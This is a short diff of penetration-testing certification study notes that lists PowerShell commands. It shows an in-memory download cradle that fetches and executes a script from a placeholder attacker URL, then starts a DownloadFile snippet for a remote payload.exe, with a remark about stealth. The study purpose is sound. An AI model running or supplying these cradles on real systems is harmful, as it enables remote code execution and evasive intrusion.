ForeCyberSec/eCPPT-Notes/Command-list.md

 # PowerShell

-// in memory download cradle. if using cmd prompt, use single quotes instead This downloads and executes a remotely hosted PS script
+- in memory download cradle. if using cmd prompt, use single quotes instead This downloads and executes a remotely hosted PS script

 PS C:\> iex (New-Object Net.WebClient).DownloadString("http://attacker_url/script.ps1")

-//DownloadFile method.
+- DownloadFile method.
 Do not use this if trying to remain stealthy.
 The local var is where the file will be saved to

 PS C:\> $downloader = New-Object System.Net.WebClient
 PS C:\> $payload = "http://attacker_url/payload.exe"